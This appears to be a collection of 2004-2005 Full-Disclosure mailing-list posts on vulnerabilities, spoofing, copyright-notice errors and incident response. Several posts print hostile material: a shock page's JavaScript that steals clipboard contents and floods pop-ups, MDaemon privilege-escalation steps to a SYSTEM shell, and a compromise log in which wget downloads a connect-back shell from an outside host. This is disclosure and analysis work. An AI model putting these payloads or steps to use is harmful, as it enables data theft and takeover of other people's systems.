[Full-Disclosure] Re: Homograph attack fools (older versions of) Internet Explorer too

2005-02-09 Thread Kevin Connolly
Use of Unicode codes in the href fools older versions of IE when it parses
the hostname part.
Obviously this has been fixed in a previous patch (my bad for not checking with
a fully patched machine first! )
NOT vulnerable  IE 6.0.2800.1106.xpsp2.040919-1003C0
vulnerable  IE 6.0.2800.1106.xpsp2.030422-1633
I may get around to writing up the details but it is not urgent now that
I know that fully patched IE is not vulnerable to this.
Kevin
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ICMP Covert channels question

2005-02-02 Thread Kevin
cyberpixl wrote:
 Well, what i meant was what if i use the networks router as a bounce
 host in order to get the packets into the network?

 If an icmp packet arrives at routers wan port with a source ip of an
 internal host will it send the echoreply to its lan port?

Yes.  Lacking proper anti-spoof ingress filtering, this will work.

 I currently haven't got the chance to test this, but i will as soon as
 i can. Then, in order to receive replyes from the host behind the
 firewall all I'd have to do is make it send packets to a bounce server
 outsede the network, like google.com with source set to my ip
 (assuming then that the router freely allows icmp traffic out 
 of the network).

Yes, lacking proper anti-spoof egress filtering, this will work.  A
correctly configured firewall should reject such packets on several
grounds, even if ICMP is permitted by policy.


On Wed, 02 Feb 2005 13:02:07 -0500, [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
  Also, packet filtering is based on router configuration. More and more
  administrators are filtering packets with unexpected source and/or
  destination addresses ( ingress and egress filtering ).

Proper ingress and egress filtering at all edge routers is critical
for security.
Rarely do I find a small site blocking outbound traffic based on the source IP.
While non-routable *destination* addresses should not make it across the
Internet, it is common for unroutable source addresses to be seen on inbound
packets coming from the Internet.


 The number of sites doing proper filtering may be growing, but it's certainly
 still low enough that the attack still has a fairly high chance of working.

With the a growing number of ISPs implementing Reverse Path Forwarding 
(aka Unicast RPF) on all customer connections, it should become more
difficult to inject spoofed traffic through reputable providers.

Kevin
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Scan for IRC

2005-01-21 Thread Kevin
On Fri, 21 Jan 2005 17:34:00 -0600, RandallM [EMAIL PROTECTED] wrote:
 I am so sorry for interrupting the list. I'm trying to pick up IRC
 communications on the network. I've made some filters for Ethereal and
 Observer but can't seem to pick it up. I'm doing something wrong. Used the
 6668-6669 ports. Any help?

Not only can an IRC server be on any port (as mentioned by Oliver
Leitner), but clients can also tunnel the connection through proxies,
or even fully encrypt chat sessions inside SSL, within an SSH tunnel,
or in a binary packet protocol such as SILC.

Assuming the communication is in the clear, you could use Snort to
detect IRC communication, regardless of port.  More on this topic can
be found here:
http://www.giac.org/practical/GSEC/Chris_Hanna_GSEC.pdf

Kevin

(P.S. I don't know who Chris Hanna is, but the paper seems sound.)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MediaSentry false positives?

2005-01-13 Thread Kevin
On Wed, 05 Jan 2005 09:53:55 -0500, [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
 On Tue, 04 Jan 2005 23:22:27 CST, Kevin said:
  I see two likely possibilities -- either MediaSentry is not using due
  diligence in verifying that the material for which they send
  infringement notices is actually shared from the address they show in
  the complaint,

It turns out that this is the case.

Just this morning we received a message from the copyright holder (Not
MediaSentry, they've completely ignored our emails and phone calls
through the whole process) stating Please disregard the notice you
received. It was generated incorrectly, and the case ID or IDs
mentioned are now closed. (A configuration problem with our
anti-piracy vendor's system caused some notices to be sent in error.)



  or somebody on the Internet is spoofing BGP route
  announcements for unused address space out of larger allocations.
 
 This is actually quite likely a possibility.  There are enough tier-1's who do
 a piss-poor job of filtering their BGP feeds that if you can inject an
 announcement you can hijack the address block. 

Thanks to BJ Premore from Renesys, we have been able to confirm that
the addresses in question were _not_ hijacked during the time period
where MediaSentry reported an infringing file share.

The only recent hijack event covering any of our reported IP
addresses didn't match up with any of the incident timestamps, was
related to the December 24th Turk Telekom incident, one of many
thousand prefixes announced through TTNet.

We are investigating using Renesys services, myASn, and other BGP
monitoring approaches to proactively detect future hijacks. 
Unfortunately, this doesn't address any underlying flaws in the
mechanisms used by MediaSentry (and other similar services) to detect
and report copyright infringement.

Kevin Kadow
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-12 Thread Kevin Reiter
original got bounced (mailbox full?)

: snip
:
: : Windows Explorer is an advanced browsing tool made by Microsoft. It is used
: : in daily tasks to open folders, copy files, delete files, rename files and
: : view files on a system. It is the foundation of the World Wide Web and used
:
: OK, we need to figure out which Explorer this guy is talkin' about - 
Internet
: Explorer or Windows Explorer.
:
: : Shogun Suzuki discovered that a remote user can connect to any machine via
: : numerous exploits and use Windows Explorer to view files, rename files,
: : delete files, change permissions on files stored on a remote machine that
: : has been pwned.
:
: ..such as ...  (HINT:  What 'sploits?)
:
: : On a command prompt: del C:\WINDOWS\explorer.exe
:
: Erm...sure...OK.   But what happens when the poor sucker reboots the box and
: discovers the O/S is inop (provided the O/S even lets you delete the file in 
the
: first place, since explorer.exe is the shell ...)?
:
: Sorry, but this was the very first post I saw after I joined this list a 
little
: bit ago, and I couldn't resist a few comments.  Is this guy for real, or is 
this
a
: joke?
:
: -K
:
: ___
: Full-Disclosure - We believe in it.
: Charter: http://lists.netsys.com/full-disclosure-charter.html
:
:

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MediaSentry false positives?

2005-01-11 Thread Kevin
On Wed, 05 Jan 2005 13:00:41 +0100, Florian Weimer [EMAIL PROTECTED] wrote:
 Kevin Kadow wrote:
  Has anybody received Notice of claimed infringement from MediaSentry
  for IP addresses which, while registered to you or your organization,
  are in a range not actively in use?
 
 I've independently received another report of this problem.
 
  I see two likely possibilities -- either MediaSentry is not using due
  diligence in verifying that the material for which they send
  infringement notices is actually shared from the address they show in
  the complaint,  or somebody on the Internet is spoofing BGP route
  announcements for unused address space out of larger allocations.
 
 RIPE doesn't have an announcement of the prefix, so I think
 MediaSentry was in error.
 
 I don't think it makes sense for MediaSentry to check their findings
 more closely from a business perspective.  They don't try to download
 the infringing material to confirm that redistribution actually takes
 place, either.

Sounds like an opportunity to take down MediaSentry.

The takedown notices state the following:

] On behalf of copyright holder, owner of the exclusive rights to the
] copyrighted material at issue in this notice, we hereby state, that
] we have a good faith belief that use of the material in the manner
] complained of is not authorized by copyright holder, its respective
] agents, or the law.
]
] Also, we hereby state, under penalty of perjury, under the laws of
] the State of California and under the laws of the United States, that the
] information in this notification is accurate and that we are authorized 
] to act on behalf of the owner of the exclusive rights being infringed
] as set forth in this notification.

Given the references to good faith and perjury in the above text,
if the data collection methods employed by MediaSentry are
demonstrably faulty, falsely implicate source IP addresses not
actually participating in file sharing (not a spoofed BGP route,
rather a bogus entry in the Kazaa or eDonkey indexes showing the wrong
source IP), MediaSentry may no longer be protected by the good faith
clause?

Kevin
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Kevin Reiter
snip

: Windows Explorer is an advanced browsing tool made by Microsoft. It is used
: in daily tasks to open folders, copy files, delete files, rename files and
: view files on a system. It is the foundation of the World Wide Web and used

OK, we need to figure out which Explorer this guy is talkin' about - Internet
Explorer or Windows Explorer.

: Shogun Suzuki discovered that a remote user can connect to any machine via
: numerous exploits and use Windows Explorer to view files, rename files,
: delete files, change permissions on files stored on a remote machine that
: has been pwned.

..such as ...  (HINT:  What 'sploits?)

: On a command prompt: del C:\WINDOWS\explorer.exe

Erm...sure...OK.   But what happens when the poor sucker reboots the box and
discovers the O/S is inop (provided the O/S even lets you delete the file in the
first place, since explorer.exe is the shell ...)?

Sorry, but this was the very first post I saw after I joined this list a little
bit ago, and I couldn't resist a few comments.  Is this guy for real, or is 
this a
joke?

-K

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Backdoors and source code (was Re: [Full-Disclosure] Multiple Backdoors found...)

2005-01-07 Thread Kevin
On Sun, 02 Jan 2005 20:27:09 -0800, Blue Boar [EMAIL PROTECTED] wrote:
 Dave Aitel wrote:
  Of course, this sort of thing is basically impossible to disprove -
  especially without source.
 
 If I were looking for a well-hidden backdoor, I wouldn't bother with
 source.  There's no guarantee that a particular binary was produced by a
 particular group of source unless you can compile it yourself to the
 same set of bytes.

And even when you have two binary files built by the same compiler
version on two different machines running the same OS version, it's
not uncommon for the two files to not produce the same set of bytes. 
See the recent thread on 'httpd cleanup' from the OpenBSD 'tech' list.


 Even then, you've got no guarantee the backdoor
 isn't introduced as part of the build process or a compiler quirk,
 rather than being in the source.

On the subject of visible source as a protection against backdoors,
I notice that PGP.Com offers source code to their products for
download for exactly this purpose, but does *not* provide any
instructions on how to validate that the binaries produced from the
visible source PGP desktop for Windows match up with the binary
executables and libraries distributed when you install a licensed PGP
desktop build.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] MediaSentry false positives?

2005-01-05 Thread Kevin
Has anybody received Notice of claimed infringement from MediaSentry
for IP addresses which, while registered to you or your organization,
are in a range not actively in use?

I recently received two notices from MediaSentry for MPAA material,
each listing a single file shared via Kazaa, for two very different IP
addresses for which I am a contact.

In both cases, the IP addresses reported were in fact within the range
allocated, however the address shown is not only not in use, no
address with the same first three octets is either used or announced
via BGP, nor have they ever been publicly visible.


I see two likely possibilities -- either MediaSentry is not using due
diligence in verifying that the material for which they send
infringement notices is actually shared from the address they show in
the complaint,  or somebody on the Internet is spoofing BGP route
announcements for unused address space out of larger allocations.

Before I panic and start researching solutions to address the latter
problem, I'm hoping to first verify whether in fact the MediaSentry
notices have any basis in fact?


Thanks,

Kevin Kadow

(P.S. If you have received a similar Notice of claimed infringement
letter from MediaSentry for unused IP addresses, please feel free to
contact me privately.)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] List of worm and trojan files

2004-12-24 Thread Kevin
Carilda A Thomas [EMAIL PROTECTED] wrote:
I have been looking but I cannot find a list all in one
place of the various illegitimate files that various worms
and trojans install into Microsoft systems.

What'd really help here is a list of MD5 checks for known bad
binaries.  Obviously a custom build of sdbot or just a simple hexedit
would defeat this, but such a list would still have value against
automated attacks, etc.

 Perhaps I should clarify about this list thing:  A friend
 of mine is apparently running a rogue email server and a
 rogue ftp server, and none of the virus checkers we have
 tried will determine what program or where.  I looked for
 a windows equivalent to lsof but there doesn't appear to
 be one - 

Sysinternals has applications that, taken in combination, do much of
what 'lsof' does under Unix.

Specifically, tcpview
(http://www.sysinternals.com/ntw2k/source/tcpview.shtml) will show you
any listening sockets, the associated process, and the location from
which the process launched.  This should suffice to locate a rogue FTP
service on a Windows PC.

the one I found can only determine the program if
 it sees a packet go by and cannot find a quiescent
 program.  The A/V checkers do not flag an email server,
 considering it a legitimate program.  Task manager is also
 destroyed, so there is no help there.  I was hoping to
 find a list of illegitimate files for which I could check.

Assuming the attacker is competent, the only way to clean a deeply
compromised machine is to reformat the drive and start from scratch. 
The truly paranoid will question whether just formatting the drive is
sufficient.

Kevin Kadow
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] TCP Port 42 port scans? What the heck over...

2004-12-15 Thread Kevin Finisterre
Theres a patch out today...
Microsoft Security Bulletin MS04-045:
Vulnerability in WINS Could Allow Remote Code Execution (870763)
Bulletin URL:
http://www.microsoft.com/technet/security/bulletin/MS04-045.mspx
Version Number: 1.0
Issued Date: Tuesday, December 14, 2004
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Important
Patch(es) Replaced: This bulletin replaces a prior security update. See 
the frequently asked questions (FAQ) section of this bulletin for the 
complete list.
Caveats: None

-KF
Florian Weimer wrote:
* James Lay:

Here they be.  ODD.  Anyone else seeing this?

Probably yes. 8-) 42/TCP is used by Microsoft's WINS replication, and
this service has got a security hole for which Microsoft has yet to
release a patch.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] [Advisory] Mozilla Products Remote Crash Vulnerability

2004-12-06 Thread Kevin Finisterre
(gdb) c
Continuing.
[New Thread 147461 (LWP 10836)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 10810)]
0x4a8b in GlobalWindowImpl::MakeScriptDialogTitle () from 
/usr/lib/mozilla/components/libgklayout.so
(gdb) bt
#0  0x4a8b in GlobalWindowImpl::MakeScriptDialogTitle () from 
/usr/lib/mozilla/components/libgklayout.so
#1  0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so
#2  0x412cb905 in NSGetModule () from 
/usr/lib/mozilla/components/libxpconnect.so
#3  0x412d28a5 in NSGetModule () from 
/usr/lib/mozilla/components/libxpconnect.so
#4  0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so
#5  0x40069215 in js_Interpret () from /usr/lib/libmozjs.so
#6  0x400604ac in js_Execute () from /usr/lib/libmozjs.so
#7  0x4003b8b4 in JS_EvaluateUCScriptForPrincipals () from 
/usr/lib/libmozjs.so
#8  0x411068c8 in nsJSContext::EvaluateString () from 
/usr/lib/mozilla/components/libgklayout.so
#9  0x40fa0020 in nsScriptLoader::EvaluateScript () from 
/usr/lib/mozilla/components/libgklayout.so
#10 0x40f9fc2e in nsScriptLoader::ProcessRequest () from 
/usr/lib/mozilla/components/libgklayout.so
#11 0x40f9f7a5 in nsScriptLoader::IsScriptEventHandler () from 
/usr/lib/mozilla/components/libgklayout.so
#12 0x4101c6e7 in nsHTMLScriptElement::MaybeProcessScript () from 
/usr/lib/mozilla/components/libgklayout.so
#13 0x4101bc66 in nsHTMLScriptElement::SetDocument () from 
/usr/lib/mozilla/components/libgklayout.so
#14 0x40f5ac89 in nsGenericElement::AppendChildTo () from 
/usr/lib/mozilla/components/libgklayout.so
#15 0x41045de4 in HTMLContentSink::ProcessSCRIPTTag () from 
/usr/lib/mozilla/components/libgklayout.so
#16 0x410431d0 in HTMLContentSink::Init () from 
/usr/lib/mozilla/components/libgklayout.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#18 0x08a756e8 in ?? ()
#19 0x08d9bd30 in ?? ()
#20 0xb1a8 in ?? ()
#21 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#22 0x08c8e9b8 in ?? ()
#23 0x in ?? ()
#24 0xb1a8 in ?? ()
#25 0x41570f8c in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#26 0x08c8e9b8 in ?? ()
#27 0x08d9bd30 in ?? ()
#28 0xb1d8 in ?? ()
#29 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#30 0x0054 in ?? ()
#31 0x in ?? ()
---Type return to continue, or q return to quit---
#32 0xb1d8 in ?? ()
#33 0x41572a56 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#34 0x08c8e9b8 in ?? ()
#35 0x08d9bd30 in ?? ()
#36 0xb1d8 in ?? ()
#37 0x4156889f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#38 0x08162600 in ?? ()
#39 0x in ?? ()
#40 0x08c8e9b8 in ?? ()
#41 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#42 0x0001 in ?? ()
#43 0x0001 in ?? ()
#44 0xb228 in ?? ()
#45 0x4156f1a5 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#46 0x08c8e9b8 in ?? ()
#47 0x08d9bd30 in ?? ()
#48 0x0054 in ?? ()
#49 0x0001 in ?? ()
#50 0x in ?? ()
#51 0x08d9bd30 in ?? ()
#52 0x08c8e9b8 in ?? ()
#53 0x4157132e in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#54 0xb218 in ?? ()
#55 0x415b2840 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#56 0x0001 in ?? ()
#57 0x0001 in ?? ()
#58 0x0001 in ?? ()
#59 0x08c8e9b8 in ?? ()
#60 0x0001 in ?? ()
#61 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#62 0x in ?? ()
#63 0x in ?? ()
---Type return to continue, or q return to quit---
#64 0xb268 in ?? ()
#65 0x4156ffcc in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#66 0x08c8e9b8 in ?? ()
#67 0x08972690 in ?? ()
#68 0x0054 in ?? ()
#69 0x08d9bd30 in ?? ()
#70 0x08972800 in ?? ()
#71 0x in ?? ()
#72 0x000f in ?? ()
#73 0x0054 in ?? ()
#74 0x08d9bd30 in ?? ()
#75 0x08c8e9b8 in ?? ()
#76 0x0001 in ?? ()
#77 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#78 0x in ?? ()
#79 0x08972690 in ?? ()
#80 0xb348 in ?? ()
#81 0x4156e357 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#82 0x08c8e9b8 in ?? ()
#83 0x08972690 in ?? ()
#84 0x0028 in ?? ()
#85 0x0805d486 in nsSubstring::Assign ()
Previous frame inner to this frame (corrupt stack?)

-KF
Niek van der Maas wrote:
Hi,
I'm posting it here, the Mozilla guys didn't want to answer or even
confirm this bug. No idea whether this one is exploitable or not, I'll
leave that over to the readers of these lists.
Bye,
Niek van der Maas
MaasOnline
http://maas-online.nl/
Mozilla Products Remote Crash Vulnerability
===
Vendor: The Mozilla Organisation
Product(s): Navigator, Firefox, other Gecko based products
Version(s): All released versions
Platform(s)   : All platforms (confirmed on Windows, Linux and SunOS)
Discovered by : Niek van der Maas, MaasOnline (http://maas-online.nl/)
Advisory URL  : 

Re: [Full-Disclosure] Lycos Europe organizing a DDoS attack against spammers

2004-12-01 Thread Kevin
On Tue, 30 Nov 2004 13:38:31 +0100 (CET), Feher Tamas
[EMAIL PROTECTED] wrote:
 Lycos Europe organizing a DDoS attack against spammers
 
 Lycos Europe has started organizing a distributed
 denial-of-service attack against web sites run by spammers.
 
 Lycos, via its makelovenotspam.com website,
 is offering a free screensaver for download.
 The screensavers make constant http requests to spam websites.

Can anybody provide pointers on how to detect this traffic
by reviewing squid proxy logs?

I'd guess that at least a few of our (thousands of) users will install
makelovenotspam, but lacking the authority to lock down
or examine desktops, I'm limited to reviewing access logs after the
fact to track down offenders.


Thanks,

Kevin Kadow

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Old LS Trojan?

2004-12-01 Thread Kevin Finisterre
You should think a CISSP could write such a script in like 5 minutes.
David S. Morgan wrote:
Hey all,
I am looking for an old LS trojan, with trojan being a misnomer.  Essentially, 
the scinario is that the admin (root) has a . (dot) in his path.  The bad-user 
knows this, and has crafted an LS shell script (the part that I can't find) 
that essentially copies /sbin/sh to a hidden directory and then performs some 
suid majik to make the sh run as if they were root, without needing the root 
password.  The file then removes itself and does the real version of ls.
Does anyone remember this one, and have the ls script anywhere?  I would like to use it 
in a demonstration.  I know that this has probobly been fixed in various ways, but I have 
old Unixes for just such occasions.
Dave Morgan
David S. Morgan CISSP, CCNP 
aka: [EMAIL PROTECTED]

When the winds of change blow hard enough, even the most tiny object
can become a deadly projectile
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] this is fun?

2004-11-30 Thread Kevin Finisterre
Um yeah... fun.
404 error then to this form which auto submits:
htmlheadtitleGNAA Last Measure version 3.4/title/headbody
form name=clip method=post action=index.php 
style=display:none
input type=text name=content
input type=hidden name=send value=1
input type=hidden name=refer value=
input type=hidden name=user value=
input type=submit
/form
script language=javascript
// without this if statement check, it bombs out with an error
if (typeof clipboardData != 'undefined') {
var content = clipboardData.getData(Text);
document.forms[clip].elements[content].value = content;
}
document.forms[clip].submit();
/script
/body/html



Then this code:
html
head
meta name=generator content=
HTML Tidy for Linux/x86 (vers 1st March 2004), see www.w3.org
titleOur lawyer has informed us that we need a warning. So, if
you are under the age of 18 or find this offensive, please leave
immediately/title
script language=JavaScript type=text/javascript
window.name = 'lastmeasure';
function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) 
alert(Our lawyer has informed us that we need a war
+ning. So, if you are under the age of 18 or find this offensive, please 
leave immediately); }
function ctrlkey() { if (event.keyCode == 17) alert(Our lawyer has 
informed us that we need a warning. So, if you are unde
+r the age of 18 or find this offensive, please leave immediately); }
function delkey() { if (event.keyCode == 46) alert(LAST MEASURE BY 
PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubg
+irl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's 
Wife\nWhat the fuck? That guy's ass is showing in
+his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker 
bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROP
+S TO GNAA.  LOL HY --DiKKy (GNAA NORWAY CORRESPONDANT)); }

var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;
var goat = 0;
/*
 let's figure out what the fuck kind of browser the poor plebs are using :(
 MSIE gets a special kind of last measure where I start off with a
ModelessDialog and pop up from it. Gets around google toolbar. -- 
goat-see */

var nom = navigator.appName.toLowerCase();
var agt = navigator.userAgent.toLowerCase();
var is_major  = parseInt(navigator.appVersion);
var is_minor  = parseFloat(navigator.appVersion);
var is_ie = (agt.indexOf(msie) != -1);
var is_ie4up  = (is_ie  (is_major = 4));
var is_nav= (nom.indexOf('netscape')!=-1);
var is_nav4   = (is_nav  (is_major == 4));
var is_mac= (agt.indexOf(mac)!=-1);
var is_gecko  = (agt.indexOf('gecko') != -1);
//  GECKO REVISION
var is_rev=0
if (is_gecko) {
temp = agt.split(rv:)
is_rev = parseFloat(temp[1])
}

function procreate(){
if(window.opener) {return 0;} // fuck procreating like rabbits -- goat-see
// sleep(1);
popUp(christmas.php);
popUp(lemonparty.php);
popUp(penisbird.php);
popUp(pillowfight.php);
popUp(tubgirl.php);
popUp(spin.php);
popUp(freak.php);
popUp(rustina.php);
popUp(loopback.php);
popUp(eww.php);
popUp(weightlifter.php);
}
function newXlt(){
xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
window.focus()}
function newXrt(){
xOff = Math.ceil(7 * Math.random())  * 5 - 10 ;
}
function newYup(){
yOff = Math.ceil( 0 - 6 * Math.random())  * 5 - 10 ;
}
function newYdn(){
yOff = Math.ceil( 7 * Math.random())  * 5 - 10  ;
}
function fOff(){
flagrun = 0;
}
function popUp(URL) {
day = new Date();
id = day.getTime();
eval(page + id +  = window.open(URL, '_blank', 
'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,widt
+h=640,height=583'););
}

function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos  screen.width-175){
newXlt();
}
if (xPos  0){
newXrt();
}
if (yPos  screen.height-100){
newYup();
}
if (yPos  0){
newYdn();
}
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
/script
/head
body background=hello.jpg bgcolor=#FF onmousemove= 
playBall(); onLoad=playBall();
leftmargin=0 topmargin=0 marginwidth=0 marginheight=0
forminput type=submit value=CLICK ME name=CLICK ME 
style=width: 2000px; height: 2000px; background-image: url('po+oped.jpg'
);
src=hello.jpg height=300 width=300 onmouseover=if(is_ie) 
{showModelessDialog('procreator.php'); return true; }docume
+nt.goatse
.reset();playBall();return true;
onclick=if(is_ie) {showModelessDialog('procreator.php'); return true; } 
playBall();return true;
onmouseout=if(is_ie) {showModelessDialog('procreator.php'); return 
true; } else{procreate();} playBall();return true;
 img src=pooped.jpg onmouseover=
if(is_ie) {showModelessDialog('procreator.php'); return true; } 
procreate();playBall();return true;
onmouseout=if(is_ie) 

Re: [Full-Disclosure] Is www.sco.com hacked?

2004-11-29 Thread Kevin Finisterre
Would not surprise me...
They STILL use their own vulnerable version of WU ftp server. Even after 
being told multiple times year after year to patch their stuff up. I 
think I will run out of fingers to count the number of individuals @SCO 
or @Caldera that I have told about this...

http://lists.netsys.com/pipermail/full-disclosure/2003-August/008577.html
-KF
Peter Prochaska wrote:
Rossen Naydenov [EMAIL PROTECTED] wrote:

I just noticed the banner on www.sco.com
If you don't saw it( because it is removed) this is what they say:
We own all your code
pay us all your money
Or is it some commercial trick?

Yes it's hacked. Read the text that the woman wrote on the chalkboard :-)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Privilege escalation flaw in MDaemon 7.2.

2004-11-29 Thread Kevin Finisterre
I discovered and reported this to the vendor over a year ago... the 
vendor did not respond to me either. Now thats service with a smile. =]
-KF

Reed Arvin wrote:
Summary:
A privilege escalation flaw exists in MDaemon 7.2 (http://www.mdaemon.com).
Details:
A privilege escalation technique can be used to gain SYSTEM level
access while interacting with the MDaemon tray icon.
Vulnerable Versions:
MDaemon 7.2
Solutions:
The vendor was notified of the issue. There was no response.
Exploit:
1. Double click on the mail icon in the Taskbar to open the Alt-N
MDaemon Pro window.
2. Click File, click New
3. Notepad should open.  In Notepad click File, click Open
4. In the Files of type: field choose All Files
5. Navagate to %WINDIR%\System32\
6. Right click cmd.exe and choose Open
7. A new command shell will open with SYSTEM privileges
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

2004-10-26 Thread Kevin
On Tue, 26 Oct 2004 16:47:21 +0100, Airey, John [EMAIL PROTECTED] wrote:
 Therefore my point still stands that if someone does possess a mathematical solution 
 to the above, then all bets are off.
 (Whoever it was who disagreed about my statements on encryption, please remember the 
 context of the thread is about SSL security, not one-time keys).

Agreed.  Current SSL standards rely on public key encryption methods
which obtain their strength from the difficulty of the factoring
problem.

 Getting back to the original question, you can't discover if someone is sending RPC 
 over https unless you have a solution to the RSA hard problem above. Nor is it a 
 major security issue if someone is using RPC over https either, unless there are 
 flaws in the implementation of SSL or RPC that could be exploited by someone else.

Yes -- however, there are workarounds.
If you control one end point or the other, then you can take steps to
permit examination of the contents of SSL sessions.

Server:
If you control the server, you can of course load the keys into the
sniffer (risky, but not unheard of, see
http://www.radware.com/content/products/ct100/default.asp)) or 
terminate the SSL session on a device under your control. (For an
RPC-over-HTTP example, see this document:
http://www.msexchange.org/pages/article_p.asp?id=613)

Client:
If you control the client (say a corporate desktop PC), you have
another option -- you can modify the clients list of trusted CAs, and
force the client to establish the SSL session to your proxy server. 
This gives the proxy an opportunity to inspect/log/modify the
cleartext contents of the session.  The proxy establishes it's own SSL
session to the remote server normally neither the client or server
would be aware of the MITM.

A freeware implementation of this MITM approach was Achilles, I have
also seen at least one commercial product offering this functionality
to permit content-scanning of outbound HTTPS browser traffic.

Kevin Kadow

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] xpire.info splitinfinity.info - exploits in the wild

2004-10-24 Thread Kevin
On Sun, 24 Oct 2004 13:47:04 +0200, Elia Florio [EMAIL PROTECTED] wrote:
 Hi list,
 i'm doing some analysis on a Linux-Mandrake 9.0 web server
 of a person that was compromised in October.
 In this host now it's installed a special trojan that insert a
 malicious IFRAME tag into every served .PHP page.
. . .
 I've found inside Apache log that the hacker break-in inside the machine
 using an overflow and injecting an executable /tmp/a.out via qmail-inject.

I'm not sure that qmail-inject isn't a red herring?  The actual
download looks like 'wget' was used.

 These are the suspicious log lines :
 
 [Sun Oct  3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
 fault (11)
 [Sun Oct  3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
 fault (11)
 [Sun Oct  3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
 fault (11)
 [Mon Oct  4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
 fault (11)
 qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO
 [EMAIL PROTECTED]
 [Mon Oct  4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
 fault (11)
 [Mon Oct  4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
 fault (11)
 [Tue Oct  5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
 fault (11)
 qmail-inject: fatal: unable to parse this line:
 To: Drugo:[EMAIL PROTECTED]
 sh: -c: option requires an argument
 --15:50:07--  http://xpire.info/cli.gz
   = `/tmp/a.out'
 Resolving xpire.info... fatto.
 Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
 inviata, aspetto la risposta... 200 OK
 Lunghezza: 19,147 [text/plain]
 
0K ..    100% 9.97K
 
 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
 
 [Fri Oct  8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
 fault (11)
 [Sat Oct  9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
 fault (11)
 
 Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
 Linux,
 possible containing a ConnectBack shell. Inside this ELF file you can grep
 these strings:
 
 Usage:  %s host port
 pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
 fork pty, bye!
 Fuck you so
